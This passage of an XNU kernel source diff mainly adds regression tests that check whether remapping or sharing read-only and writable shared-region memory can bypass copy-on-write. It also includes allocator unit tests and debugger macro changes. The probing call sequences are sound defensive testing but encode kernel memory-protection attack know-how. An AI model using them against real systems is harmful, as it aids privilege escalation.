*/ + goto skip_vm_remap_new_ro; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap_new() bypassed copy-on-write"); + } else { + T_PASS("vm_remap_new() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + T_PASS("vm_remap_new() read-only"); +skip_vm_remap_new_ro: +#else /* defined(VM_MEMORY_ROSETTA) */ + /* pre-BigSur SDK: no vm_remap_new() */ + T_LOG("No vm_remap_new() to test"); +#endif /* defined(VM_MEMORY_ROSETTA) */ + + /* test mach_make_memory_entry_64(VM_SHARE) of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + 
MACH_PORT_NULL); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_mem_entry_vm_share_ro; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write"); + } else { + T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still 
read-only"); + /* check that new mapping is a copy */ + tmp_address = remap_address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(depth, 0, "new mapping is unnested"); +// T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only"); +// T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + T_PASS("mem_entry(VM_SHARE) read-only"); +skip_mem_entry_vm_share_ro: + + /* test mach_make_memory_entry_64() of RO */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_EQ(kr, KERN_PROTECTION_FAILURE, "mach_make_memory_entry_64()"); + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + 
prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); +// T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only"); + if (depth > 0) { + T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only"); + } + T_PASS("mem_entry() read-only"); + + + /* + * Step 2 - check that one can not share write access with a writable + * mapping in the shared region. + */ + size = 0; + for (address = SHARED_REGION_BASE; + address < SHARED_REGION_BASE + SHARED_REGION_SIZE; + address += size) { + size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &address, + &size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()"); + if (kr == KERN_INVALID_ADDRESS) { + T_SKIP("could not find writable nested mapping"); + T_END; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + address, address + size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + if (depth > 0 && (info.protection & VM_PROT_WRITE)) { + /* nested and writable: bingo! 
*/ + break; + } + } + if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) { + T_SKIP("could not find writable nested mapping"); + T_END; + } + + /* test vm_remap() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + kr = mach_vm_remap(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()"); + if (!(cur_prot & VM_PROT_WRITE)) { + T_LOG("vm_remap(): 0x%llx not writable %s/%s", + remap_address, prot_str[cur_prot], prot_str[max_prot]); + T_ASSERT_FAIL("vm_remap() remapping not writable"); + } + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap() bypassed copy-on-write"); + } else { + T_PASS("vm_remap() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot 
still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + +#if defined(VM_MEMORY_ROSETTA) + if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) { + T_PASS("vm_remap_new() is not present"); + goto skip_vm_remap_new_rw; + } + /* test vm_remap_new() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_address = 0; + remap_size = size; + cur_prot = VM_PROT_READ | VM_PROT_WRITE; + max_prot = VM_PROT_READ | VM_PROT_WRITE; + kr = mach_vm_remap_new(mach_task_self(), + &remap_address, + remap_size, + 0, + VM_FLAGS_ANYWHERE, + mach_task_self(), + address, + FALSE, + &cur_prot, + &max_prot, + VM_INHERIT_DEFAULT); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... */ + goto skip_vm_remap_new_rw; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()"); + if (!(cur_prot & VM_PROT_WRITE)) { + T_LOG("vm_remap_new(): 0x%llx not writable %s/%s", + remap_address, prot_str[cur_prot], prot_str[max_prot]); + T_ASSERT_FAIL("vm_remap_new() remapping not writable"); + } + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("vm_remap_new() bypassed copy-on-write"); + } else { + T_PASS("vm_remap_new() did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + 
(vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); +skip_vm_remap_new_rw: +#else /* defined(VM_MEMORY_ROSETTA) */ + /* pre-BigSur SDK: no vm_remap_new() */ + T_LOG("No vm_remap_new() to test"); +#endif /* defined(VM_MEMORY_ROSETTA) */ + + /* test mach_make_memory_entry_64(VM_SHARE) of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + if (kr == KERN_PROTECTION_FAILURE) { + /* wrong but not a security issue... 
*/ + goto skip_mem_entry_vm_share_rw; + } + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)"); + T_QUIET; T_ASSERT_EQ(remap_size, size, "mem_entry(VM_SHARE) should cover whole mapping"); +// T_LOG("AFTER MAKE_MEM_ENTRY(VM_SHARE) 0x%llx...", address); fflush(stdout); fflush(stderr); getchar(); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); +// T_LOG("AFTER VM_MAP 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar(); + *(uint32_t *)(uintptr_t)remap_address = before + 1; +// T_LOG("AFTER WRITE 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar(); + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + if (before != after) { + T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write"); + } else { + T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write"); + } + /* check that region is still nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + info.object_id); + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); 
+ T_QUIET; T_ASSERT_GT(depth, 0, "still nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + mach_port_deallocate(mach_task_self(), mem_entry); +skip_mem_entry_vm_share_rw: + + /* test mach_make_memory_entry_64() of RW */ + before = *(uint32_t *)(uintptr_t)address; + remap_size = size; + mem_entry = MACH_PORT_NULL; + kr = mach_make_memory_entry_64(mach_task_self(), + &remap_size, + address, + VM_PROT_READ | VM_PROT_WRITE, + &mem_entry, + MACH_PORT_NULL); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64()"); + remap_address = 0; + kr = mach_vm_map(mach_task_self(), + &remap_address, + remap_size, + 0, /* mask */ + VM_FLAGS_ANYWHERE, + mem_entry, + 0, /* offset */ + FALSE, /* copy */ + VM_PROT_READ | VM_PROT_WRITE, + VM_PROT_READ | VM_PROT_WRITE, + VM_INHERIT_DEFAULT); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()"); + remap = *(uint32_t *)(uintptr_t)remap_address; + T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original"); + *(uint32_t *)(uintptr_t)remap_address = before + 1; + after = *(uint32_t *)(uintptr_t)address; + T_LOG("mem_entry(): 0x%llx 0x%x -> 0x%x", address, before, after); + *(uint32_t *)(uintptr_t)remap_address = before; + /* check that region is no longer nested */ + tmp_address = address; + tmp_size = 0; + depth = 99; + count = VM_REGION_SUBMAP_INFO_COUNT_64; + kr = mach_vm_region_recurse(mach_task_self(), + &tmp_address, + &tmp_size, + &depth, + (vm_region_recurse_info_t)&info, + &count); + T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()"); + T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x", + tmp_address, tmp_address + tmp_size, depth, + prot_str[info.protection], + prot_str[info.max_protection], + share_mode_str[info.share_mode], + 
info.object_id); + if (before != after) { + if (depth == 0) { + T_PASS("mem_entry() honored copy-on-write"); + } else { + T_FAIL("mem_entry() did not trigger copy-on_write"); + } + } else { + T_FAIL("mem_entry() did not honor copy-on-write"); + } + T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed"); +// T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed"); + T_QUIET; T_ASSERT_EQ(depth, 0, "no longer nested"); + T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable"); + T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable"); + /* cleanup */ + kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size); + T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()"); + mach_port_deallocate(mach_task_self(), mem_entry); +} + T_DECL(copyoverwrite_submap_protection, "test copywrite vm region submap \ protection", T_META_ALL_VALID_ARCHS(true)) { @@ -1029,14 +1701,14 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \ the shared region triggers code-signing violations", T_META_ALL_VALID_ARCHS(true)) { - char *addr; + uint32_t *addr, before, after; int retval; int saved_errno; kern_return_t kr; vm_address_t map_addr, remap_addr; vm_prot_t curprot, maxprot; - addr = (char *)&printf; + addr = (uint32_t *)&printf; #if __has_feature(ptrauth_calls) map_addr = (vm_address_t)(uintptr_t)ptrauth_strip(addr, ptrauth_key_function_pointer); #else /* __has_feature(ptrauth_calls) */ @@ -1052,31 +1724,43 @@ T_DECL(wire_text, "test wired text for rdar://problem/16783546 Wiring code in \ VM_INHERIT_DEFAULT); T_ASSERT_EQ(kr, KERN_SUCCESS, "vm_remap error 0x%x (%s)", kr, mach_error_string(kr)); + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d", saved_errno, strerror(saved_errno), EACCES); + } else if (after != before) { + 
T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire shared text"); } - addr = (char *) &fprintf; + addr = (uint32_t *) &fprintf; + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire shared text error %d (%s), expected: %d", saved_errno, strerror(saved_errno), EACCES); + } else if (after != before) { + T_ASSERT_FAIL("shared text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire shared text"); } - addr = (char *) &testmain_wire_text; + addr = (uint32_t *) &testmain_wire_text; + before = *addr; retval = mlock(addr, 4096); + after = *addr; if (retval != 0) { saved_errno = errno; T_ASSERT_EQ(saved_errno, EACCES, "wire text error return error %d (%s)", saved_errno, strerror(saved_errno)); + } else if (after != before) { + T_ASSERT_FAIL("text changed by wiring at %p 0x%x -> 0x%x", addr, before, after); } else { T_PASS("wire text"); } diff --git a/tests/xnu_quick_test.entitlements b/tests/xnu_quick_test.entitlements deleted file mode 100644 index ada01fb2a..000000000 --- a/tests/xnu_quick_test.entitlements +++ /dev/null @@ -1,8 +0,0 @@ - - - - - com.apple.rootless.datavault.controller.internal - - - diff --git a/tests/xnu_quick_test_entitled.c b/tests/xnu_quick_test_entitled.c deleted file mode 100644 index 24c96e43f..000000000 --- a/tests/xnu_quick_test_entitled.c +++ /dev/null @@ -1,85 +0,0 @@ -#include - -#include -#include -#include -#include -#include -#include -#include -#include - -#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) -#include -#endif - -T_GLOBAL_META( - T_META_NAMESPACE("xnu.quicktest"), - T_META_CHECK_LEAKS(false), - T_META_RUN_CONCURRENTLY(true) - ); - - -/* ************************************************************************************************************** - * Test ioctl system calls. 
- * ************************************************************************************************************** - */ -T_DECL(ioctl, "Sanity check of ioctl by exercising DKIOCGETBLOCKCOUNT and DKIOCGETBLOCKSIZE", - T_META_ASROOT(true)) -{ - int my_err; - int my_fd = -1; - struct statfs * my_infop; - char * my_ptr; - int my_blksize; - long long my_block_count; - char my_name[MAXPATHLEN]; - -#if !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) - /* - * this test won't be able to open the root disk device unless CSR is - * disabled or in AppleInternal mode - */ - if (csr_check( CSR_ALLOW_UNRESTRICTED_FS ) && - csr_check( CSR_ALLOW_APPLE_INTERNAL )) { - T_SKIP("System Integrity Protection is enabled"); - } -#endif - - T_SETUPBEGIN; - - T_WITH_ERRNO; - T_ASSERT_GT(getmntinfo( &my_infop, MNT_NOWAIT ), 0, "getmntinfo"); - - /* make this a raw device */ - strlcpy( &my_name[0], &my_infop->f_mntfromname[0], sizeof(my_name)); - if ((my_ptr = strrchr( &my_name[0], '/' )) != 0) { - if (my_ptr[1] != 'r') { - my_ptr[strlen( my_ptr )] = 0x00; - memmove( &my_ptr[2], &my_ptr[1], (strlen( &my_ptr[1] ) + 1)); - my_ptr[1] = 'r'; - } - } - - T_ASSERT_POSIX_SUCCESS(my_fd = open( &my_name[0], O_RDONLY ), "open"); - - T_SETUPEND; - - /* obtain the size of the media (in blocks) */ - T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKCOUNT, &my_block_count ), - "ioctl DKIOCGETBLOCKCOUNT"); - - /* obtain the block size of the media */ - T_EXPECT_POSIX_SUCCESS(my_err = ioctl( my_fd, DKIOCGETBLOCKSIZE, &my_blksize ), - "ioctl DKIOCGETBLOCKSIZE"); - - T_LOG( "my_block_count %qd my_blksize %d \n", my_block_count, my_blksize ); - - if (my_err != -1) { - /* make sure the returned data looks somewhat valid */ - T_EXPECT_GE(my_blksize, 0, NULL); - T_EXPECT_LE(my_blksize, 1024 * 1000, NULL); - } - - close( my_fd ); -} diff --git a/tests/zalloc_buddy.c b/tests/zalloc_buddy.c new file mode 100644 index 000000000..76ed25900 --- /dev/null +++ b/tests/zalloc_buddy.c @@ -0,0 +1,131 @@ +#include 
+#include + +#include +#include + +#undef __abortlike +#define __abortlike +#define panic(fmt, ...) ({ T_FAIL(fmt, __VA_ARGS__); abort(); }) + +#define __security_const_late +#define ZALLOC_TEST 1 +#include "../osfmk/kern/zalloc.c" + +#define ZBA_TEST_SIZE (1ul << 20) + +static void +zba_populate_any(vm_address_t addr, vm_size_t size) +{ + int rc = mprotect((void *)addr, size, PROT_READ | PROT_WRITE); + T_QUIET; T_ASSERT_POSIX_SUCCESS(rc, "mprotect"); +} + +static void +zba_populate_nope(vm_address_t addr, vm_size_t size) +{ +#pragma unused(addr, size) + T_FAIL("Trying to extend the storage"); + T_END; +} + +static void +zba_test_allow_extension(void) +{ + zba_test_info.zbats_populate = zba_populate_any; +} + +static void +zba_test_disallow_extension(void) +{ + zba_test_info.zbats_populate = zba_populate_nope; +} + +static void +zba_test_setup(void) +{ + kern_return_t kr; + int rc; + + kr = vm_allocate(mach_task_self(), &zba_test_info.zbats_base, + ZBA_TEST_SIZE + ZBA_CHUNK_SIZE, VM_FLAGS_ANYWHERE); + T_ASSERT_MACH_SUCCESS(kr, "vm_allocate()"); + + zba_test_info.zbats_base = roundup(zba_test_info.zbats_base, + ZBA_CHUNK_SIZE); + + rc = mprotect(zba_base_header(), ZBA_TEST_SIZE, PROT_NONE); + T_ASSERT_POSIX_SUCCESS(rc, "mprotect"); + + T_LOG("SETUP allocator with base at %p", zba_base_header()); + + zba_test_allow_extension(); + zba_populate(0); + zba_init_chunk(0); +} + +T_DECL(zone_buddy_allocator_encodings, "test the buddy allocator formulas") +{ + uint8_t bits[sizeof(zba_base_header()->zbah_bits)] = { }; + + for (uint32_t o = ZBA_MAX_ORDER + 1; o-- > 0;) { + for (vm_address_t pos = 0; pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE << o) { + struct zone_bits_chain *zbc; + size_t node = zba_node(pos, o); + + zbc = zba_chain_for_node(NULL, node, o); + T_QUIET; T_ASSERT_EQ(pos, (vm_offset_t)zbc, + "zba_node / zba_chain_for_node is reversible (pos: %lx, node %zd)", + pos, node); + + + if (o == 0) { + // leaf nodes aren't represented in the bitmap + continue; + } + T_QUIET; 
T_ASSERT_LT(node, 8 * sizeof(bits), "fits in bitfield: %zd", pos); + T_QUIET; T_ASSERT_EQ(0, bits[node / 8] & (1 << (node % 8)), "never seen"); + bits[node / 8] ^= 1 << (node % 8); + } + } + + T_PASS("zba_node, zba_chain_for_node look sane"); +} + +T_DECL(zone_buddy_allocator, "test the zone bits setup") +{ + vm_address_t base, pos; + + zba_test_setup(); + + zba_test_disallow_extension(); + + base = (vm_address_t)zba_slot_base(); + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } + + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + zba_test_allow_extension(); + + base += ZBA_CHUNK_SIZE; + for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + T_QUIET; T_ASSERT_EQ(base + pos, zba_alloc(0), "alloc"); + *(uint64_t *)(base + pos) = ~0ull; + } + + for (pos = zba_chunk_header_size(1); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } + base -= ZBA_CHUNK_SIZE; + for (pos = zba_chunk_header_size(0); pos < ZBA_CHUNK_SIZE; pos += ZBA_GRANULE) { + zba_free(base + pos, 0); + } +} diff --git a/tools/lldbmacros/Makefile b/tools/lldbmacros/Makefile index f00ff970a..f20f231da 100644 --- a/tools/lldbmacros/Makefile +++ b/tools/lldbmacros/Makefile @@ -79,7 +79,8 @@ LLDBMACROS_PYTHON_FILES = $(LLDBMACROS_USERDEBUG_FILES) \ pgtrace.py \ xnutriage.py \ zonetriage.py \ - sysreg.py + sysreg.py \ + counter.py ifneq ($(PLATFORM),MacOSX) LLDBMACROS_PYTHON_FILES+= \ diff --git a/tools/lldbmacros/core/kernelcore.py b/tools/lldbmacros/core/kernelcore.py index d21b5c912..0168046c9 100755 --- a/tools/lldbmacros/core/kernelcore.py +++ b/tools/lldbmacros/core/kernelcore.py 
@@ -314,6 +314,7 @@ class KernelTarget(object): self._thread_groups = [] self._allproc = [] self._terminated_tasks_list = [] + self._terminated_threads_list = [] self._zones_list = [] self._zombproc_list = [] self._kernel_types_cache = {} #this will cache the Type objects as and when requested. @@ -591,6 +592,17 @@ class KernelTarget(object): caching.SaveDynamicCacheData("kern._terminated_tasks_list", self._terminated_tasks_list) return self._terminated_tasks_list + if name == 'terminated_threads' : + self._terminated_threads_list = caching.GetDynamicCacheData("kern._terminated_threads_list", []) + if len(self._terminated_threads_list) > 0 : return self._terminated_threads_list + thread_queue_head = self.GetGlobalVariable('terminated_threads') + thread_type = LazyTarget.GetTarget().FindFirstType('thread') + thread_ptr_type = thread_type.GetPointerType() + for trd in 